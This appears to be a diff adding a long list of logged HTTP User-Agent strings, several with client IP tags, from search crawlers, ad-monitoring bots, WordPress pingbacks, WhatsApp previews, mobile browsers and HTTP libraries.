    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.226]
    +WhatsApp/2.2043.21 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604263740-0
    +WordPress/5.5.2; https://nastoysam.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604194839-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604209168-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604209179-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604248303-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201022.171020
    +WordPress/5.5.3; https://payameirani.com
    +NokiaC3-00/5.0 (08.65) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; en-us; nokiac3-00) UCBrowser8.3.0.154/69/444/UCWEB Mobile UNTRUSTED/1.0
    +GuzzleHttp/6.5.5 curl/7.29.0 PHP/7.4.11
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 PTST/201022.171020 [ip:35.233.190.247]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.215]
    +okhttp/3.11.0 [ip:37.163.203.245]
    +okhttp/3.12.5 [ip:170.78.28.239]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.72.44]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.72.48]
    +python-requests/2.18.4 [ip:213.32.4.81]
    +Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) [ip:195.154.122.161]
    +okhttp/3.11.0 [ip:37.163.168.82]
    +Apache-HttpClient/4.5.10 (Java/11.0.8)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 PTST/201102.151111
    +okhttp/3.11.0 [ip:109.118.114.2]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.242]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604333030-0
    +python-requests/2.6.0 CPython/2.7.5 Linux/2.6.32-042stab145.3
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201102.151111
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604342892-10
    +WordPress/5.5.3; https://softwareproof.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604301973-0
    +WordPress/5.5.3; https://iniciarbr.net
    +Iframely/1.4.5 (+https://github.com/itteco/iframely)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604342880-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604342881-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604349439-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 PTST/201102.151111
    +WhatsApp/2.20.206.1 A
    +WordPress/5.5.3; https://blogchain.com.ua
    +NetSurf/3.8 (RISC OS)
    +okhttp/3.11.0 [ip:37.162.184.185]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.233]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.39]
    +okhttp/3.11.0 [ip:37.160.178.63]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.209]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.7]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.116]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.82]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.13]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.51]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.110]
    +okhttp/3.11.0 [ip:185.210.114.72]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604364594-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604419160-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604369169-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604369172-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 OPR/71.0.3770.271
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) adbeat.com/policy Gecko/20100101 Firefox/82.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1604429376-0
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/86.0.4240.96 Mobile Safari/537.36
    +WordPress/5.3.6; https://turbocomputer.ru
    +Apache-HttpClient/4.5.2 (Java/1.8.0_242)
    +okhttp/3.11.0 [ip:37.160.213.183]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.36]
    +okhttp/3.11.0 [ip:37.163.68.186]
    +okhttp/3.11.0 [ip:151.46.74.106]
    +WordPress/5.5.3; https://www.madeinbo.tv [ip:89.46.110.206]
    +okhttp/3.9.1 [ip:109.53.8.212]
    +okhttp/3.12.5 [ip:188.104.161.127]
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 OPR/71.0.3770.228
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604488483-0
    +WhatsApp/2.2043.22 N
    +WordPress/5.5.3; https://bitlab.com.br/bitwiki
    +Java-http-client/11.0.9
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 4.4.4; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +WhatsApp/2.20.206.2 A
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 PTST/201104.151122
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 PTST/201104.191133
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604531199-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604459297-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604473120-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604454162-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604459285-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604459288-0
    +WordPress/5.5.3; https://softwarevan.com
    +WordPress.com; http://softwarevan.com
    +WordPress.com; https://softwarevan.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604473109-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604473178-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604480921-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604480933-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604512186-0
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.10]
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201104.151122
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604515605-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604515606-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604515607-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201104.191133
    +Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
    +WordPress/5.5.3; https://czn-chekhov.ru
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0; AS-5433_Secret ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.173]
    +okhttp/3.12.5 [ip:185.95.147.21]
    +Googlebot-Video/1.0 [ip:213.32.4.247]
    +Googlebot-Video/1.0 [ip:66.249.73.92]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon,"Googlebot"
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Google (+https://developers.google.com/+/web/snippet/) ip 66.102.6.212
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.51]
    +okhttp/3.11.0 [ip:5.169.243.42]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:173.252.127.117]
    +Googlebot-Video/1.0 [ip:66.249.73.88]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.132]
    +Googlebot-Video/1.0 [ip:213.32.4.115]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 PTST/201104.221132
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.131]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.112]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604535205-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604553244-0
    +WordPress/5.5.3; https://www.gritfeat.com
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1; SM-C111 ) U2/1.0.0 Mobile
    +WordPress/5.4.4; https://gawcie.com; verifying pingback from 157.51.186.252
    +WordPress/5.3.6; https://i-fix-it.ru
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.245]
    +WhatsApp/2.20.120.21 i
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Mobile Safari/537.36 PTST/201104.221132
    +yacybot (/global; amd64 Linux 4.19.0-12-amd64; java 11.0.9; Europe/de) http://yacy.net/bot.html
    +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/86.0.4240.96Safari/537.36
    +Java/1.8.0_272
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604536373-0
    +WhatsApp/2.20.206.4 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1604552360-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1604561687-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604611506-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604611507-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1604585054-60
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1604585032-60
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1604590460-60
    +node-superagent/4.1.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604611506-60
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0.1; SM-J701F ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604611504-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604611508-10
    +Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0
    +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~answerlive1004)
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.211]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.102]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.247]
    +okhttp/3.12.5 [ip:94.103.226.71]
    +okhttp/3.11.0 [ip:37.163.126.72]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.90]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.92]
    +WhatsApp/2.20.202.18 A [ip:177.137.198.128]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.234]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.81]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.95]
    +okhttp/3.12.5 [ip:197.56.149.224]
    +Go-http-client/1.1 [ip:213.32.4.115]
    +okhttp/3.11.0 [ip:37.163.1.94]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.90]
    +okhttp/3.12.5 [ip:83.149.47.95]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:66.249.90.247]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.245]
    +curl/7.61.1 [ip:44.241.225.163]
    +okhttp/4.8.1 [ip:213.32.4.95]
    +okhttp/3.12.5 [ip:95.116.181.100]
    +python-requests/2.21.0 [ip:213.32.4.115]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604627454-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604627466-0
    +WordPress/5.3.6; https://wiki-helpdesk.gasnet.it
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604677543-0
    +Python/3.6 aiohttp/3.7.2
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604700786-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604677544-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604677554-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604638074-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604638087-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604645919-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604621253-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1604625977-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604630468-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604632795-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604632777-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604641858-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604641872-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Mobile Safari/537.36 PTST/201104.221132 [ip:35.233.190.247]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604645908-0
    +WhatsApp/2.20.206.5 A
    +WordPress/5.2.9; https://esperanto.berlin
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.13]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.140 Safari/537.36 (compatible; Google-Shopping-Quality +http://www.google.com/merchants/tos/extend/RU/tos.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604667792-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1604703857-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604635451-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604647534-0
    +okhttp/3.11.0 [ip:37.161.252.136]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.4]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.155]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.180]
    +okhttp/3.11.0 [ip:37.163.220.75]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.66.40]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.247]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.211]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.245]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.245]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1604732413-0
    +WordPress/5.5.3; https://giemo.es
    +WordPress/5.5.3; https://abcserial.com
    +yacybot (/global; amd64 Linux 5.4.0-52-generic; java 1.8.0_272; Australia/en) http://yacy.net/bot.html
